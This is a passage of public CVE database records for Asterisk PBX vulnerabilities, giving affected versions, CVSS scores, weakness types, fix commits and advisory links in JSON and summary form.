"url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2023/Dec/24"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-49786",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-08T14:19:55.907894Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-08T14:20:19.222Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "asterisk",
"vendor": "asterisk",
"versions": [
{
"status": "affected",
"version": "\u003c 18.20.1"
},
{
"status": "affected",
"version": "\u003e= 19.0.0, \u003c 20.5.1"
},
{
"status": "affected",
"version": "= 21.0.0"
},
{
"status": "affected",
"version": "\u003c 18.9-cert6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-703",
"description": "CWE-703: Improper Check or Handling of Exceptional Conditions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-29T00:06:18.647Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
},
{
"name": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
},
{
"name": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
},
{
"url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
},
{
"url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
},
{
"url": "http://seclists.org/fulldisclosure/2023/Dec/24"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"source": {
"advisory": "GHSA-hxj9-xwr8-w8pq",
"discovery": "UNKNOWN"
},
"title": "Asterisk susceptible to Denial of Service via DTLS Hello packets during call initiation"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-49786",
"datePublished": "2023-12-14T19:47:46.306Z",
"dateReserved": "2023-11-30T13:39:50.862Z",
"dateUpdated": "2025-02-13T17:18:55.224Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-37457 (GCVE-0-2023-37457)
Vulnerability from cvelistv5 – Published: 2023-12-14 19:43 – Updated: 2025-02-13 17:01
VLAI?
Title
Asterisk's PJSIP_HEADER dialplan function can overwrite memory/cause crash when using 'update'
Summary
Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the 'update' functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the 'update' functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa.
Severity ?
7.5 (High)
CWE
- CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T17:16:30.273Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
},
{
"name": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "asterisk",
"vendor": "asterisk",
"versions": [
{
"status": "affected",
"version": "\u003c= 18.20.0"
},
{
"status": "affected",
"version": "\u003e= 19.0.0, \u003c= 20.5.0"
},
{
"status": "affected",
"version": "= 21.0.0"
},
{
"status": "affected",
"version": "\u003c= 18.9-cert5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the \u0027update\u0027 functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "CWE-120: Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-29T00:06:20.393Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
},
{
"name": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"source": {
"advisory": "GHSA-98rc-4j27-74hh",
"discovery": "UNKNOWN"
},
"title": "Asterisk\u0027s PJSIP_HEADER dialplan function can overwrite memory/cause crash when using \u0027update\u0027"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-37457",
"datePublished": "2023-12-14T19:43:30.945Z",
"dateReserved": "2023-07-06T13:01:36.996Z",
"dateUpdated": "2025-02-13T17:01:26.636Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-49294 (GCVE-0-2023-49294)
Vulnerability from cvelistv5 – Published: 2023-12-14 19:40 – Updated: 2025-02-13 17:18
VLAI?
Title
Asterisk Path Traversal vulnerability
Summary
Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue.
Severity ?
4.9 (Medium)
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T21:53:45.375Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
},
{
"name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
},
{
"name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "asterisk",
"vendor": "asterisk",
"versions": [
{
"status": "affected",
"version": "\u003c 18.20.1"
},
{
"status": "affected",
"version": "\u003e= 19.0.0, \u003c 20.5.1"
},
{
"status": "affected",
"version": "= 21.0.0"
},
{
"status": "affected",
"version": "\u003c 18.9-cert6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-29T00:06:21.896Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
},
{
"name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
},
{
"name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"source": {
"advisory": "GHSA-8857-hfmw-vg8f",
"discovery": "UNKNOWN"
},
"title": "Asterisk Path Traversal vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-49294",
"datePublished": "2023-12-14T19:40:46.157Z",
"dateReserved": "2023-11-24T16:45:24.314Z",
"dateUpdated": "2025-02-13T17:18:40.277Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-46837 (GCVE-0-2021-46837)
Vulnerability from cvelistv5 – Published: 2022-08-30 00:00 – Updated: 2024-08-04 05:17
VLAI?
Summary
res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-15297 symptoms but not for exactly the same reason. The crash occurs because there is an append operation relative to the active topology, but this should instead be a replace operation.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |
|---|---|---|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T05:17:42.455Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-15297 symptoms but not for exactly the same reason. The crash occurs because there is an append operation relative to the active topology, but this should instead be a replace operation."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-11-18T00:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-46837",
"datePublished": "2022-08-30T00:00:00",
"dateReserved": "2022-08-30T00:00:00",
"dateUpdated": "2024-08-04T05:17:42.455Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-26651 (GCVE-0-2022-26651)
Vulnerability from cvelistv5 – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:11
VLAI?
Summary
An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2, 18.11.2, and 19.3.2, and 16.8-cert14.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:11:43.391Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2, 18.11.2, and 19.3.2, and 16.8-cert14."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-11-18T00:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
},
{
"url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-26651",
"datePublished": "2022-04-15T00:00:00",
"dateReserved": "2022-03-07T00:00:00",
"dateUpdated": "2024-08-03T05:11:43.391Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-26498 (GCVE-0-2022-26498)
Vulnerability from cvelistv5 – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:03
VLAI?
Summary
An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:03:32.984Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-05-04T00:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
},
{
"url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
},
{
"url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-26498",
"datePublished": "2022-04-15T00:00:00",
"dateReserved": "2022-03-06T00:00:00",
"dateUpdated": "2024-08-03T05:03:32.984Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-26499 (GCVE-0-2022-26499)
Vulnerability from cvelistv5 – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:03
VLAI?
Summary
An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it's possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:03:32.912Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it\u0027s possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-11-18T00:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
},
{
"url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-26499",
"datePublished": "2022-04-15T00:00:00",
"dateReserved": "2022-03-06T00:00:00",
"dateUpdated": "2024-08-03T05:03:32.912Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-32558 (GCVE-0-2021-32558)
Vulnerability from cvelistv5 – Published: 2021-07-27 05:19 – Updated: 2024-08-03 23:25
VLAI?
Summary
An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T23:25:30.855Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2021/Jul/49"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
},
{
"name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
},
{
"name": "DSA-4999",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "https://www.debian.org/security/2021/dsa-4999"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-11-02T10:06:13",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2021/Jul/49"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
},
{
"name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
